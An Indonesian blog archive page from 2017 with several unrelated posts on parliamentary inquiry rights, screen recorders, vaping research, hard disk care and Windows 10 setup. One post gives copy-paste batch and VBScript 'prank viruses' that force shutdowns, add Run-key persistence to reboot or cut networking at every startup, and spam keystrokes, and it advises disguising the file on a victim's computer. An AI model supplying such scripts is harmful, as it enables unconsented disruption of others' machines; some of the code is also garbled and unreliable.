Minggu, 30 April 2017

Pengertian Hak Angket Serta Landasannya. Hak angket merupakan salah satu hak yang dimiliki DPR. Hak ini melekat atau dilekatkan pada fungsi atau jabatan DPR. Karena itu, hak angket diletakkan sebagai hak institusi atau hak kelembagaan. Penggunaan hak kelembagaan utamanya hak angket menjadi petunjuk berfungsinya DPR. Berikut adalah penjelasan seputar pengertian Hak Angket.

Pengertian Hak Angket Serta Landasannya

Definisi Hak Angket

Berikut adalah beberapa pengertian Hak Angket yang dikutip dari berbagai sumber yang antara lain adalah :
  1. Pengertian Hak angket adalah perangkat untuk merealisasikan fungsi DPR. Selain hak kelembagaan, hak perseorangan (anggota) juga menjadi alat untuk merealisasikan melaksanakan fungsi DPR seperti hak mengajukan usul rancangan undang-undang, hak mengajukan pertanyaan, hak menyampaikan usul dan pendapat.
  2. Hak angket adalah merupakan hak untuk mengetahui keadaan pemerintahan baik dalam rangka mengetahui pelaksanaan pemerintahan maupun untuk mencari bahan-bahan untuk merumuskan kebijakan, atau untuk memberikan persetujuan atau pertimbangan mengenai orang, keadaan atau suatu peristiwa. Hak angket bukan hak untuk mengetahui mengenai kemungkinan telah terjadi tindak pidana atas suatu kasus.
  3. Pasal 77 ayat (3) UU No. 27 Tahun 2009 tentang MPR, DPR, DPD, dan DPRD (MD3) yang menyebutkan �Hak angket ... adalah hak DPR untuk melaksanakan penyelidikan terhadap pelaksananaan suatu undang-undang dan/atau kebijakan Pemerintah yang berkaitan dengan hal penting, strategis, dan berdampak luas pada kehidupan bermasyarakat, berbangsa, dan bernegara yang diduga bertentangan dengan peraturan perundang-undangan�. Rumusan ketentuan ini memang tidak bersangkutan dengan pelaksanaan fungsi legislasi. sehingga tidak mengherankan apabila keberadaan hak angket dianggap tidak bersangkutan dengan pelaksanaan fungsi legislasi. Padahal, hak ini dapat dipergunakan sebagai sarana melakukan evaluasi, menemukan gagasan untuk menciptakan atau mengubah UU yang ada. Karena hak ini tidak pernah dipergunakan untuk mencari bahan-bahan untuk merumuskan kebijakan, DPR kerapkali kehilangan ide dan gagasan, kesulitan menggunakan hak mengajukan usul rancangan UU.
Selain untuk kepentingan legislasi, hak angket juga ditujukan untuk menyeldiki pelaksanaan tugas pemerintahan dan pembelanjaan negara. Kalau berpegang pada ketentuan Pasal 77 ayat (3) UU No. 27 Tahun 2009, hak angket ditujukan untuk menyelidiki pelaksanaan suatu UU dan/ atau kebijakan pemerintah yang diduga bertentangan dengan peraturan perundang-undangan.

Landasan Hak Angket

  1. Landasan Filosofis
  2. Landasan Sosiologi
  3. Landasan Hukum

Jumat, 28 April 2017


Siapa sih yang tidak takut dengan virus di komputer? Saat komputer terkena virus, maka besar kemungkinan komputer kamu jadi tidak bisa digunakan. Apalagi jika komputer kamu kena salah satu dari 20 virus komputer paling berbahaya di dunia. Tamat sudah, antara harus beli komputer baru atau install ulang.
Di balik seramnya serangan virus komputer, maka JalanTikus berikan kamu kumpulan script hacker untuk membuat virus komputer sederhana. Mau nggak? Biar kelihatan pintar kayak hacker profesional gitu. Simak 7 script hacking membuat virus sederhana dengan notepad.

7 Script Hacking Membuat Virus Sederhana

Sudah tahu virus komputer itu berbahaya, kok JalanTikus bagikan cara membuat virusnya sih? Ya karena virus komputer yang JalanTikus bagikan ini cuma berisi script sederhana yang akan mengacaukan fungsi komputer tanpa merusak hardware atau membocorkan informasi yang ada di dalamnya. Jadi aman dan cocok untuk digunakan menjahili komputer teman kamu.

1. Membuat Virus Shutdown

Cara kerja virus komputer sederhana ini adalah dengan memaksa komputer teman atau target jadi Shutdown. Untuk melakukannya, silakan buka Notepad, dan copy paste kode di bawah. Lalu save file-nya dengan nama ForceShutdown.bat dan type file-nya All file.

  1. @echo off

  2. msg * I don't like you

  3. shutdown -c "Error! Komputer kamu terpaksa harus Shutdown!" -s


Untuk mengaktifkan virus ini, kamu harus klik 2 kali pada file-nya. Maka, secara otomatis virus ini akan berjalan.

2. Paksa Shutdown Setiap Kali Dinyalakan

Berbeda dengan virus sebelumnya, virus sederhana yang ini akan memaksa komputer teman kamu untuk Shutdown setiap kali dinyalakan. Eits, jangan asal gunakan virus ini kalo gak siap tanggung akibatnya ya!

  1. echo @echo off>c:windowshartlell.bat

  2. echo break off>>c:windowshartlell.bat

  3. echo shutdown -r -t 11 -f>>c:windowshartlell.bat

  4. echo end>>c:windowshartlell.bat

  5. reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v startAPI /t reg_sz /d c:windowshartlell.bat /f

  6. reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v /t reg_sz /d c:windowshartlell.bat /f

  7. echo You have been HACKED.

  8. PAUSE


Simpan file buatan kamu di atas dengan nama apapun. Jangan lupa gunakan ekstensi .bat ya! Lalu klik untuk mengaktifkannya.

3. Mematikan Internet Secara Permanen

Saat berada di suatu jaringan internet, pasti kesal dong jika ada orang yang malah download? Bikin internet lemot karena bandwith berkurang cepat. Makanya, coba matikan internet teman kamu menggunakan script virus sederhana berikut:

  1. echo @echo off>c:windowswimn32.bat

  2. echo break off>>c:windowswimn32.bat

  3. echo ipconfig/release_all>>c:windowswimn32.bat

  4. echo end>>c:windowswimn32.bat

  5. reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f

  6. reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f

  7. echo You Have Been HACKED!

  8. PAUSE


Seperti biasa, simpan dengan nama apapun dan gunakan ekstensi .bat. Lalu klik untuk mengaktifkannya!

4. Virus Caps Lock

Siapa yang tidak kesal jika ada orang ngetik isinya huruf besar semua? Orang yang menerima pesan dengan huruf besar semua jelas akan merasa terganggu, atau bahkan marah. Makanya, yuk isengin teman kamu dengan membuat tombol Caps Lock-nya nyala terus menggunakan script virus sederhana berikut:

  1. Set wshShell =wscript.CreateObject("WScript.Shell")

  2. do

  3. wscript.sleep 100

  4. wshshell.sendkeys "{CAPSLOCK}"

  5. loop


cara-membuat-virus-sederhana-dengan-notepad-4
Copy dan paste kode di atas ke Notepad, lalu simpan dengan nama file ForceCapsLock.vbs dan type file-nya All file. Klik 2 kali untuk mulai mengaktifkan virus komputer sederhana ini.

5. Virus Alay

Siapa bilang cuma anak muda kekinian doang yang bisa alay? Komputer kamu juga bisa alay loh kalo terinspeksi virus keyboard alay. Nah, untuk membuat virus komputer yang akan membuat keyboard jadi alay, kamu bisa gunakan script berikut:

  1. Set wshShell =wscript.CreateObject("WScript.Shell")

  2. do

  3. wscript.sleep 100

  4. wshshell.sendkeys "{CAPSLOCK}"

  5. wscript.sleep 100

  6. wshshell.sendkeys "{NUMLOCK}"

  7. wscript.sleep 100

  8. wshshell.sendkeys "{SCROLLLOCK}"

  9. loop


cara-membuat-virus-sederhana-dengan-notepad-3
Caranya sama, copy dan paste kode di atas ke Notepad. Lalu save dengan nama ForceAlay.vbs dan type file All file.
Cara Membuat Virus Komputer Sederhana Berikut Solusinya (Part 3)

6. Virus Orang Jelek

Dikatain jelek itu emang nyebelin. Kalo cuma sekali dua kali sih harusnya masih bisa ditahan, tapi kalo terus-terusan ngatain jelek gimana coba? Nah, dengan kode di bawah ini, kamu bisa membuat sebuah virus komputer sederhana yang akan memaksa komputer target untuk mengeluarkan alert bahwa 'dia jelek' tanpa henti.

  1. Set wshShell = wscript.CreateObject("WScript.Shell")

  2. do

  3. wscript.sleep 100

  4. wshshell.sendkeys "Muka Lu Jelek Kayak Komputer Lu"

  5. loop


cara-membuat-virus-sederhana-dengan-notepad-1
Copy dan paste script virus sederhana di atas ke Notepad. Oh iya, kamu bisa ganti bagian warna merah dengan kata-kata sesuai selera, lalu save dengan nama VirusOrangJelek.vbs.

7. Virus Kuis

Semua orang suka kuis apalagi kalo berhadiah. Tapi kamu bakal kesal deh pasti kalo setiap kali mau buka komputer, ternyata yang nongol adalah kuis. Ya kan? Buat kamu yang mau isengin komputer target dengan kuis-kuis menyebalkan, coba kamu gunakan script berikut:

  1. @echo off

  2. title Kuis hari ini!

  3. :menu

  4. cls

  5. echo Jika kamu kena virus apa yang kamu lakukan?

  6. pause

  7. echo pilih yang mana:

  8. echo 1. Matiin komputer

  9. echo 2. Format aja

  10. echo 3. Nangis

  11. echo 4. Beli komputer baru

  12. set input=nothing

  13. set /p input=Choice:

  14. if %input%==1 shutdown -s -t

  15. 30

  16. if %input%==2 del c:xxx

  17. if %input%==3 @ECHO off

  18. msg * Muka lu jelek

  19. msg * Ngaca dulu gih!

  20. msg * Hayo lu, CPU lu gw acak-acak ya

  21. msg * Udah, install ulang aja

  22. msg * Mau kelar kan masalahnya?

  23. @ECHO off

  24. :top

  25. START %SystemRoot%

  26. system32notepad.exe

  27. GOTO top


cara-membuat-virus-sederhana-dengan-notepad-2
Copy dan paste deh ke Notepad dengan nama ViruzQuiz.bat. Selesai, tinggal jalankan untuk mengujinya.
Agar berjalan lancar, coba simpan file virus komputer sederhana yang kamu buat di komputer target. Lalu letakkan file tersebut di desktop, dan jangan lupa ubah ikon shortcut-nya jadi aplikasi favorit target.
Mudah, bukan? Selamat mencoba!

Ada saat di mana kita diharuskan untuk merekam aktivitas layar komputer menjadi sebuah video. Misalnya saja untuk membuat video tutorial, merekam game, presentasi, momen istimewa, dan keperluan lainnya. Maka dari itu, kamu membutuhkan software perekam layar komputer terbaik untuk mendapatkan hasil rekaman video yang berkualitas.

Dilansir dari Tech Viral, software screen recorder sendiri adalah aplikasi yang dirancang khusus untuk merekam suatu kegiatan yang ada pada sebuah layar komputer atau laptop. Beberapa fitur penting yang harus diperhatikan adalah dukungan format video, kualitas video, dan suaranya. Langsung saja, berikut 7 software perekam layar komputer terbaik di Windows.

1. Open Broadcaster Software


Open Broadcaster Software atau disingkat OBS adalah salah satu software perekam layar komputer terbaik. OBS ini Open Source dan multi-platform, kamu dapat memasangnya di Windows, OSX, ataupun GNU/Linux. Dengan ini, kamu dapat menggunakannya untuk merekam video ataupun broadcast video ke berbagai situs online secara langsung (live streaming).
Antarmuka penggunanya sangat sederhana, tetapi punya banyak fitur. Seperti merekam desktop, merekam suara dari internal microphone ataupun external microphone, merekam webcam bawaan, ataupun merekam webcam external. Kamu dapat memodifikasi secara langsung dengan mengatur area seleksi rekaman dan bahkan dapat menambahkan text ataupun gambar pada live streaming kamu. Kamu dapat menyimpan hasilnya ke dalam format MP4 atau FLV.

2. Action!


Software perekam layar komputer terbaik selanjutnya Action!, keunggulannya mampu melakukan streaming secara real-time dan merekam video yang sangat baik pada resolusi HD. Fiturnya juga banyak seperti untuk merekam video, suara bahkan dapat digunakan untuk mengambil gambar dengan sangat cepat (screenshot) yang sangat cocok digunakan untuk memotret gambar yang ingin digunakan untuk tutorial.
Sebelum merekam layar monitor, kamu dapat mengatur dulu resolusi video hingga 1080p. Fitur lainnya dari Action! ini adalah kamu dapat memilih menu untuk merekam layar penuh, merekam game, bisa dipula diatur untuk merekam sebagian layar monitor. Format yang dihasilkan dari Action! ini adalah MP4 dan AVI.

3. XSplit Gamecaster


Keunggulan XSplit Gamecaster adalah menawarkan fitur streaming yang kuat. XSplit mampu menayangkan streaming ketika kita sedang bermain game dengan lancar dan sangat stabil. Kamu dapat mulai merekam dengan menekan satu tombol saja. Menariknya, XSplit akan mengonfigurasi pengaturan yang sesuai dengan laptop yang kamu gunakan.

4. Dxtory


Dxtory adalah software perekam layar komputer yang ringan dengan antarmuka dan pengaturan yang sangat sederhana. Dxtory ini mampu mengangkat video pada kualitas tertinggi sesuai dengan kemampuan laptop kamu. Pengaturan audionya juga cukup kuat dan mampu merekam dua suara secara bersamaan, misalnya suara dari game dan suara kamu yang kemudian dapat diedit secara terpisah.

5. WM Capture


Kelebihan WM Capture adalah kamu dapat dengan mudah merekam video pada bagian layar tertentu dan memiliki fitur schedule recording. Dengan begitu, kamu bisa menjadwalkan kapan layar komputer memulai rekaman. Jadi kamu bisa mengatur agar software berjalan otomatis sehingga dapat merekam acara live streaming ketika kamu tidak menontonnya. Hasil file dapat disimpan ke dalam format MPEG, WMV, AVI, DVD-ISO, dan lainnya.

6. ShadowPlay


ShadowPlay adalah hardware accelerated screen recording untuk PC berbasis Windows yang menggunakan GPU GeForce yang dibuat oleh Nvidia. Salah satu daya tarik dari ShadowPlay adalah kemampuan merekam mundur hingga 20 menit ke belakang. Dengan menekan shortcut, maka kamu menandakan akhir video dan graphics card akan merekam mundur ke belakang hingga sepanjang 20 menit. Alhasil momen berharga yang baru saja terlewat dapat diabadikan dalam bentuk video yang disimpan pada format MP4 dan menggunakan codec H.264.

7. Windows 10 Game Bar


Buat kamu pengguna Windows 10 tidak perlu lagi kesulitan untuk merekam layar PC, karena Windows 10 menyediakan sebuah fitur bernama Windows 10 Game Bar atau Game DVR yang dapat merekam layar secara mudah tanpa perlu bantuan apa pun. Kamu yang ingin merekam layar PC secara cepat dapat menggunakan fitur Game DVR. Cara ini hanya dapat merekam satu jendela saja sehingga jendela lain tidak akan ikut terekam ketika kita buka.
Salah satu kelebihan lainnya yakni hasil video rekaman tidak berukuran terlalu besar. Game DVR kini juga menjadi salah satu pilihan para YouTuber untuk merekam layar PC ketika bermain game. Caranya tekan Windows + G pada layar jendela yang ingin direkam.
Itulah 7 software perekam layar komputer terbaik untuk Windows. Dengan ini, kamu dapat dengan mudah merekam video tutorial ataupun merekam momen terbaik saat bermain game. Apakah kamu punya jagoan lain selain dari daftar di atas? Tambahkan di kolom komentar ya.
Penelitian Tentang Vape (rokok elektrik) -Vaporizer atau vape adalah alat sederhana yang dapat menyalurkan nikotin melalui sistem kerja baterai ke dalam tubuh manusia. Nikotin dalam berbagai macam dosis dihisap oleh pengguna melalui tabung. Kebanyakan vaporizer terdiri dari beberapa konten: sebuah baterai litium yang dapat diisi ulang, sebuah atomizer (yang memanaskan cairan sehingga tercipta uap), dan sebuah tabung (Salmon, 2009).

Saat ini, menggunakan vaporizer merupakan salah satu alternatif yang dapat dilakukan sebagai pengganti rokok, karena vape tidak mengandung tar dan karbonmonoksida yang terkandung di rokok tembakau, tetapi tetap mengandung senyawa nikotin yang dapat diturunkan dosisnya hingga dosis 0 miligram (Garner, 2014).

Meskipun jumlah bahan kimia yang ditemukan di rokok elektrik lebih sedikit dibanding rokok tembakau, chromium dan nikel ditemukan 4 kali lipat lebih banyak dalam beberapa jenis liquid vaporizer dibanding rokok tembakau (Saffari & Daher, 2014). Liquid vaporizer dan voltase pada baterai memiliki komponen yang berbahaya dan akan semakin berbahaya pada device yang memiliki high-voltage (Kosmider, 2014).

Beberapa studi telah dilakukan untuk mengetahui hubungan antara penggunaan vaporizer dan rokok tradisional. Didapatkan hasil bahwa pengguna vaporizer mengatakan bahwa vaporizer membantu mereka untuk berhenti atau mengurangi kebiasaan merokok mereka (Brown, 2014).
Dalam penelitiannya Indra et., al. (2015) yang berjudul Gambaran Psikologis Perokok Tembakau Yang Beralih Menggunakan Rokok Elektrik (Vaporizer)Empat dari lima responden menunjukkan persepsi bahwa vaporizer aman, nyaman, dan lebih sehat yang kemudian diterjemahkan oleh peneliti dalam kategori persepsi positif. Robbins (2002) mengemukakan bahwa persepsi positif merupakan penilaian individu terhadap suatu objek atau informasi dengan pandangan yang positif atau sesuai dengan yang diharapkan dari objek yang dipersepsikan atau dari aturan yang ada. Penyebab munculnya persepsi positif seseorang karena adanya kepuasan individu terhadap objek yang menjadi sumber persepsinya, adanya pengetahuan individu, serta adanya pengalaman individu terhadap objek yang dipersepsikan.

Hasil penelitian Indra et., al. (2015) didukung oleh penelitian Pearson (2011) yang berjudul “E-cigarette awareness, use, and harm perceptions in US adults” yang menyebutkan bahwa rata-rata orang kulit putih, perokok tembakau, anak-anak muda, dan tamatan sekolah menengah atas atau diploma memiliki persepsi bahwa vaporizer lebih aman dibanding rokok tembakau.

Selain itu Hasil penelitian ini didukung oleh penelitian yang dilakukan Choi (2012) yang berjudul “Characteristics associated with awareness, perceptions, and use of electronic nicotine delivery systems among young US midwestern adults” menyatakan bahwa 44.5% setuju bahwa vaporizer dapat membantu orang berhenti merokok tembakau, 42.8% setuju jika vaporizer lebih sedikit mengandung racun dibanding rokok tembakau, dan 26.3% setuju vaporizer lebih sedikit membuat kecanduan dibanding rokok tembakau.

Penelitian yang dilakukan Dawkins (2013) yang berjudul “Vaping profiles and preferences: An online survey of electronic cigarette users” yang mengatakan vaporizer secara umum sangat menyenangkan digunakan. Penelitian yang dilakukan McQueen (2011) juga menyebutkan bahwa respondennya mengatakan manfaat dari vaporizer bagi mereka lebih membuat mereka senang dengan bau dan biayanya ditambah lagi pernapasan mereka semakin membaik dibanding saat merokok tembakau.

Sumber: 
Brown, J. (2014). Real-world effectiveness of e-cigarettes when used to aid smoking cessation: a cross-sectional population study. Addiction, 109, 1532
Choi. (2012). Characteristics associated with awareness, perceptions, and use of electronic nicotine delivery systems among young US midwestern adults. American Journal of Public Health
Dawkins. (2013). Vaping profiles and preferences: an online survey of electronic cigarette users. Addiction, 1115-1125
Garner, C. (2014). A brief description of history, operation and regulation. E- Cigarette Task Force.
Indra M. F., Hasneli N. Y. dan Utami S. 2015. Gambaran Psikologis Perokok Tembakau Yang Beralih Menggunakan Rokok Elektrik (Vaporizer). Program Studi Ilmu Keperawatan. Universitas Riau.
Kosmider, L. (2014). Carbonyl compounds in electronic cigarette vapors-effects of nicotine solvent and battery output voltage. Oxford Journals.
Pearson. (2011). E-cigarette awareness, use, and harm perception in US adults. American Journal of Public Health
Robbins. (2002). Prinsip-prinsip perilaku organisasi. Jakarta: Erlangga
Saffari, A., & Daher, N. (2014). Particulate metals and organic compounds from electronic and tobacco-containing cigarettes: Comparison of emission rates and secondhand exposure.Environmental Science: Processes & Impacts, 2259-2267.
Salmon, M. (2009). The facts about electronic cigarettes. Electronic Cigarette Association, 4

Selasa, 25 April 2017

Share merupakan sebuah kegiatan berbagi kepada orang lain dengan tujuan tertentu. Nah, kali ini kita akan membahas mengenai bagaimana melakukan share jaringan internet dengan memanfaatkan fitur mobile hotspot yang ada di Windows 10. Bagi pengguna Windows 10 kami rasa sangat beruntung sekali karena dimanjakan oleh fitur-fitur terbaru yang bermanfaat. Salah satu fitur yang menarik perhatian adalah Mobile Hotspot. Jadi, ketika laptop yang digunakan terkoneksi dengan jaringan internet, maka laptop tersebut bisa berbagi koneksi melalui fitur mobile hotspot.

Hadirnya fitur ini kami rasa memberikan dampak yang besar. Jadi, kita tidak perlu lagi menginstal software ketika ingin berbagi koneksi dengan perangkat lain. Hanya saja, fitur ini masih sering mengalami error. Dibalik masih adanya error, sebaiknya kita berbicara mengenai hal positifnya saja.

Cara Berbagi Koneksi Internet Menggunakan Fitur Mobile Hotspot di Windows 10

Cara berbagi koneksi internet menggunakan fitur mobile hotspot


1. Buka halaman Settings (Tombol Windows + i).

2. Pilih Network & Internet.

3. Pilih Mobile Hotspot.

4. Pada bagian opsi Share my Internet connection from digunakan untuk memilih jenis koneksi yang akan di share. Jika kamu hanya menggunakan 1 tipe koneksi, maka langkah ini dapat dilewati.
Cara Berbagi Koneksi Internet Menggunakan Fitur Mobile Hotspot di Windows 10
Baca selengkapnya �
Hard disk merupakan salah satu komponen komputer yang perannya sangat penting. Mengapa dibilang penting? Karena semua data-data penting kamu akan tersimpan pada hard disk. Jika tiba-tiba hard disk mengalami kerusakan, pasti yang pertama dipikirkan adalah bagaimana dengan datanya apa bisa diselamatkan atau di backup ke hard disk lain? Tenang saja, jika hard disk mengalami kerusakan dan tidak bisa terbaca lagi di komputer, data-datanya tetap aman. Hanya saja untuk melakukan backup data-datanya akan membutuhkan biaya yang besar, tergantung kerusakannya juga sih.

Mau berbagi pengalaman aja nih. Saya mempunyai hard disk merk WD 750GB yang tidak bisa terbaca lagi di laptop. Akhirnya saya memutuskan untuk membawa hard disk ini ke tempat service hard disk yang terpercaya di Yogyakarta. Ternyata kerusakan terjadi pada head hard disk. Teknisinya mengatakan seluruh data bisa dikembalikan atau dibackup. Jadi saya diminta untuk menyiapkan hard disk eksternal untuk dijadikan sebagai hard disk backup. Kemudian saya diminta untuk membayar biaya sebesar 1,5 juta dan jika backup gagal maka uang akan dikembalikan. Betapa mahalnya biaya backup data hard disk itu, oleh karena itu jangan sampai hal ini terjadi pada teman-teman semuanya.

Kegunaan hard disk adalah sebagai tempat penyimpanan file-file atau data pada komputer. Tanpa hard disk, sebuah komputer tidak dapat bekerja. Hard disk juga mempengaruhi performa komputer dan laptop. Jika komputer kamu lemot, maka salah satu yang perlu dicurigai adalah hard disk. Tapi tidak selamanya hard disk yang salah jika komputer lemot. Bisa jadi karena virus, karena ukuran RAM yang kecil, file sampah yang menumpuk dan lainnya.

Faktor Penyebab Hard Disk Cepat Rusak

Faktor Penyebab Hard Disk Cepat Rusak


Sering melakukan install ulang
Sering melakukan install ulang komputer dapat menyebabkan hard disk menjadi cepat rusak. Biasanya hard disk akan mengalami bad sector jika terlalu sering di install ulang. Ketika menginstal ulang, otomatis kita akan melakukan format pada hard disk. Nah, inilah sebenarnya yang menyebabkan hard disk menjadi cepat rusak. Melakukan format secara terus menerus akan memberikan dampak yang buruk terhadap hard disk. Begitu juga dengan flash disk, sebaiknya jangan terlalu sering di format. Sebenarnya untuk menghapus seluruh data-data pada hard disk dan flashdisk cukup dengan menekan tombol Shift + Del, maka otomatis data akan terhapus secara permanen.

Install ulang tidak dianjurkan dilakukan secara terus menerus. Untuk lebih jelasnya baca pada artikel inilah yang akan terjadi jika Komputer terlalu sering di install ulang.

Listrik yang tidak normal
Listrik yang tidak stabil bisa mengakibatkan terjadinya bad sector pada hard disk. Untuk menghindari hal ini, bisa dengan menggunakan stabilizer (Stavol) sebagai alat untuk mengatur tegangan listrik agar listrik yang diterima komputer tetap stabil. Listrik yang mati tiba-tiba akan menyebabkan hard disk menjadi cepat rusak. Hal ini bisa diatasi dengan menggunakan UPS. Dengan menggunakan UPS, ketika listrik padam maka komputer tidak akan langsung mati karena UPS menyimpan daya listrik. Dengan begitu kamu mempunyai waktu untuk mematikan komputer secara normal.

Hard disk dimatikan secara paksa
Mematikan komputer atau laptop secara paksa itu sama saja memaksa hard disk untuk berhenti bekerja. Ketika piringan pada hard disk sedang bekerja dan seketika hard disk mati, maka hal ini dapat menyebabkan hard disk menjadi cepat rusak. Contoh mematikan komputer secara paksa adalah dengan menekan tombol power sampai komputer mati. Contoh lainnya adalah mencabut kabel dari power supply yang terhubung dengan listrik ketika komputer sedang menyala. Sebaiknya jangan pernah lakukan hal ini, matikanlah komputer dengan mengikuti prosedur yang benar. Caranya adalah dengan mencari tombol Shut Down yang telah disediakan oleh sistem operasi. Biasanya proses shut down ini akan berjalan agak lama, tapi itu bukanlah masalah. Prosesnya lama karena komputer akan menghentikan seluruh perangkat komputer yang sedang bekerja termasuk salah satunya hard disk.

Penggunaan yang berlebihan
Penggunakan komputer atau laptop secara berlebihan dapat berdampak buruk terhadap perangkat-perangkat lainnya. Seperti halnya dengan hard disk, jika digunakan secara berlebihan maka dapat mengakibatkan kerusakan. Bermain game, memutar video, mendengarkan musik, serta online dalam waktu yang lama akan menyebabkan bertambahnya perfoma yang dibutuhkan harddisk. Jika hal ini terus dibiarkan dalam jangka waktu yang lama, besar kemungkinan kinerja harddisk tersebut akan melemah dan rusak.

Benturan
Faktor lain yang menyebabkan hard disk cepat rusak adalah karena terjadi benturan. Benturan dan guncangan yang keras terhadap hard disk bisa saja menyebabkan hard disk rusak pada saat itu juga. Oleh karena itu, kamu harus lebih berhati-hati melakukan sesuatu yang berhubungan dengan hard disk. Ketika membawa laptop dalam tas juga lebih berhati-hati karena bisa saja menyebabkan benturan yang tidak disadari.

Over Heat
Hard disk merupakan salah satu perangkat keras yang mudah panas. Ditambah lagi jika komputer atau laptop digunakan seharian full tanpa dimatikan sejenak untuk mengistirahatkan komputer. Jangan biarkan hard disk bekerja secara terus menerus, berikan istirahat untuk menghentikan aktifitas piringan hard disk agar tidak terjadi over heat juga. Walaupun efeknya tidak dirasakan dalam waktu yang dekat, tetapi percayalah lama kelamaan hard disk akan rusak dan tinggal menunggu waktunya saja jika hard disk masih bekerja selama 24 jam sehari.

Solusi yang bisa kamu lakukan adalah dengan memasang kipas pendingin pada komputer dan menggunakan cooling pad pada laptop. Jika panas berlebihan (Over heat) dibiarkan secara terus menerus, maka dapat menyebabkan hard disk menjadi cepat rusak dan bahkan komputer akan mati total.

Faktor usia
Usia memang tidak bisa dipungkiri lagi. Meskipun kita telah merawat hard disk dengan baik, karena faktor usia ini kita tidak bisa berbuat apa-apa. Namanya juga perangkat elektronik, semakin sering digunakan maka akan melemah. Tetapi kita bisa mencegah hard disk cepat rusak dengan melakukan perawatan dan menggunakannya dengan baik. Solusi terhadap faktor usia adalah dengan rutin melakukan backup data ke hard disk eksternal.

Itulah beberapa faktor yang dapat menyebabkan hard disk menjadi cepat rusak. Jika ada tambahan silahkan tuliskan pada kolom komentar di bawah.
Windows 10 merupakan versi terbaru dari sistem operasi Microsoft Windows. Hadir dengan membawa fitur-fitur terbaru dan tercanggih saat ini. Banyak perubahan dalam sistem operasi Windows 10 dan tentunya lebih interaktif. Pada Windows 10 terdapat fitur Mobile Hotspot yang memungkinkan penggunanya untuk berbagi koneksi. Salah satu fitur yang sangat menyedot perhatian adalah fitur Night Light yang bekerja untuk mengurangi paparan cahaya biru pada layar di malam hari yang dapat memberikan efek buruk bagi kesehatan. Masih banyak fitur-fitur menarik lainnya yang harus kamu coba.

Berbicara mengenai install ulang tentunya hal yang tidak asing lagi. Menurut kami install ulang merupakan hal yang wajib untuk dipelajari agar nantinya setiap pengguna komputer bisa melakukannya sendiri. Melakukan install ulang pada komputer sendiri akan sedikit lebih baik dan merupakan cara yang efisien karena menghemat banyak waktu dan uang. Sedikit bercerita mengenai pengalaman pribadi. Ketika seseorang melakukan install ulang di tempat servis komputer, maka akan ada kemungkinan data-data di komputer dan laptop dilihat dan diakses oleh teknisi. Terus teknisi yang salah? Tidak juga, karena sebelum menginstal ulang tentunya teknisi akan memastikan dulu bahwa data-data penting telah tersimpan pada partisi yang aman. Kamu tidak mau kan jika data-data kamu dilihat oleh orang lain? Apalagi data tersebut menyangkut hal yang sangat rahasia. Oleh karena itu mulailah untuk belajar install ulang agar kamu bisa melakukannya sendiri tanpa harus membayar orang lain untuk melakukannya. Pada situs ini banyak sekali artikel yang mendukung kamu untuk belajar menginstal ulang. Pada artikel kali ini kami juga akan memberikan tahapan-tahapan yang lebih detail agar mudah dimengerti oleh pembaca semuanya.


Sebelum menginstal ulang, sebaiknya kamu baca terlebih dahulu syarat install Windows 10 dan pastikan komputer dan laptop yang akan di install telah memenuhi syarat.

Windows 10 System Requirements


  • Processor: 1 gigahertz (GHz) or faster processor or SoC.
  • RAM: 1 gigabyte (GB) for 32-bit or 2GB for 64-bit.
  • Hard disk space: 16GB for 32-bit OS or 20GB for 64-bit OS.
  • Graphics card: DirectX 9 or later with WDDM 1.0 driver.
  • Display: 800-by-600 resolution.


Persiapan sebelum melakukan install ulang Windows 10


1. Menyiapkan flashdisk sebagai media penginstalan. Kapasitas minimal flashdisk adalah 4GB dan tergantung besarnya ukuran file ISO Windows.

2. File ISO Windows versi berapa saja sesuai dengan keinginan. Kamu bisa mendownload file ISO langsung dihalaman resmi Microsoft, langkah-langkah mendownloadnya ada pada artikel cara download file ISO Windows dari halaman resmi Microsoft.

3. Membuat Bootable USB Windows.

Mengatur Booting pada BIOS

Ketika akan menginstal sistem operasi, salah satu langkah penting yang harus dilakukan adalah mengatur Booting pada BIOS. Settingan Booting ketika kamu menginstal menggunakan media flashdisk akan berbeda dengan settingan ketika menggunakan media CD/DVD. Gambar di bawah ini settingan Booting ketika hendak menginstal menggunakan flashdisk, karena posisi flashdisk berada paling awal. Jika kamu menginstal menggunakan CD/DVD maka letakkan posisi ATAPI CD/DVD berada paling atas, posisi kedua Hard Disk dan posisi yang lainnya mengikuti.


Jika kamu melakukan install ulang dengan menggunakan CD/DVD, maka atur Boot menjadi seperti pada gambar di bawah ini.


Langkah-langkah menginstal Windows 10

1. Jika pada layar muncul tulisan press any key to boot from CD or DVD, tekan sembarang tombol untuk melanjutkan proses instalasi.
Cara Install Windows 10 Lengkap dengan Gambar

Baca selengkapnya �

Senin, 24 April 2017

Berbicara seputar aplikasi sebenarnya sangat luas sekali. Namun, kali ini kita akan membicarakan mengenai aplikasi yang wajib di install pada sistem operasi Windows khususnya. Aplikasi adalah sebuah perangkat lunak yang dibuat untuk tujuan tertentu dan pastinya dapat mempermudah dan mempercepat proses pekerjaan. Benar sekali, dibuatkannya aplikasi merupakan sebuah solusi yang sangat efisien terhadap sebuah pekerjaan karena dapat menghemat tenaga, waktu, dan uang. Pekerjaan yang sebelumnya dikerjaan dengan manual dan membutuhkan tenaga yang banyak, dapat diatasi dengan membuatkan sebuah aplikasi. Namun, tidak semua pekerjaan dapat dibantu dengan menggunakan aplikasi. Hanya beberapa pekerjaan saja terutama pada bidang IT atau teknologi.

Pada sistem operasi Windows ada banyak sekali jenis aplikasi. Aplikasi-aplikasi ini bisa didapatkan dengan cara download dan membeli, karena aplikasi itu hanya ada dua yaitu free dan premium. Jika kamu mendownload aplikasi, sebaiknya jangan sembarangan mengunjungi situs download. Pilih situs download yang sudah terpercaya. Karena bisa saja seseorang jahat menyisipkan virus atau file bahaya lainnya dalam aplikasi. Sebaiknya dan sangat dianjurkan untuk menggunakan aplikasi yang premium, karena tingkat keamanannya yang lebih kuat.

Aplikasi yang Wajib di Install Pada Komputer dan Laptop

Aplikasi yang Wajib di Install Pada Komputer dan Laptop


Google Chrome
